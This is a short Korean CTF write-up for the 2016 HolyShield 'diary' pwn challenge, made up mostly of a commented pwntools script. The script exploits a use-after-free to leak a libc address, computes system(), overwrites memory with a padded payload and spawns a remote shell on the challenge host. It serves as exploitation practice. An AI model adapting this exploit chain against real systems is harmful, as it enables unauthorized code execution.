2016 holyshield diary
by St1tch. use after free bug 문제이다.
대회 때 못풀어서, 학교 셤 끝나고 다시 풀어보았다.
빨리 review문제도 풀어야겠다.
# Exploit script for the 2016 HolyShield "diary" challenge, written against
# pwntools in Python 2 syntax (note the `print` statement and str-based
# socket I/O); it will not run unmodified under Python 3.
# Flow: drive the service's text menu, read a leaked pointer printed back as
# a plan name, derive two values from it, and send a crafted comment.
from pwn import *

# Toggle between a local process (with a pause so a debugger can be attached
# to the printed pid) and the remote challenge host.
local = False
if local :
    s = process('./diary')
    print util.proc.pidof(s)
    pause()
else :
    s = remote('kimtae.xyz', 9989)


def command(token, *args) :
    """Wait until `token` appears on the global connection `s`, then send each
    value in `args` as its own line, converting it with str() first.

    No return value; raises whatever pwntools raises on EOF/timeout.
    """
    s.recvuntil(token)
    for i in args :
        i = str(i)
        s.sendline(i)


# Alias for command(); behaviour is identical, the name is just shorter.
fast = lambda token, *args : command(token, *args)


def solver() :
    """Run the whole interaction against the global connection `s`, then hand
    the session to the user with s.interactive().

    Every fast() call waits for ':' or '>' — presumably fragments of the
    service's input and menu prompts — and answers with the listed lines.
    The menu numbers, field lengths and constants below are specific to this
    challenge binary and are not derivable from this file.
    """
    log.success('login...')
    fast(':', '/bin/sh\x00', '25')
    fast('>', '3')
    fast(':', 'rop payload')
    log.success('plan create...')
    # Two plans with identical content are created, then one is freed.
    fast('>', '1', '2')
    fast(':', 'stitch', '7', '7', 'stitch')
    fast('>', '2')
    fast(':', 'stitch', '7', '7', 'stitch')
    log.success('plan free...')
    fast('>', '4', '100')
    log.success('addr leak...')
    # Listing plans again prints data from the freed entry (the post describes
    # the bug as a use-after-free); the 6 raw bytes after 'Plan name : ' are
    # zero-extended to 8 bytes so u64() can decode them.
    fast('>', '1')
    s.recvuntil('Plan name : ')
    leak = s.recv(6)+'\x00\x00'
    # 3663848 is a fixed offset taken from the target's libc build; the log
    # line below labels the result as the system address. A different libc
    # would need a different constant.
    target = hex(u64(leak) - 3663848)
    # addr: low 32 bits of the computed address, packed little-endian.
    # score: the leading hex digits after '0x', minus 100. NOTE(review): both
    # slices assume `target` has a fixed string width — fragile if the leaked
    # value's magnitude differs from what the author observed.
    addr = p32(int(target[-8:],16))
    score = int(target[2:6], 16) - 100
    log.info('system addr = {0}'.format(target))
    log.success('game 1 go...')
    # Two rounds of the "game" menu; the first round uses a throwaway comment,
    # the second feeds the derived `score` back in as a negative value.
    fast('>', '6', '3', '1', '100')
    s.recvuntil('.\n')
    s.sendline('3')
    s.recvuntil('comment\n')
    s.sendline('fuck!')
    log.success('game 2 go...')
    fast('>', '1', '-'+str(score))
    s.recvuntil('.\n')
    s.sendline('3')
    fast('>', str(score+100), '3')
    s.recvuntil('comment\n')
    # The comment is 84 bytes of padding followed by the 4-byte packed address;
    # the 84 is a challenge-specific layout constant, like the menu numbers.
    s.sendline('a'*84 + addr)
    log.success('get shell !! ')
    fast('>', '3', '1', '1')
    s.interactive()


if __name__ == '__main__' :
    solver()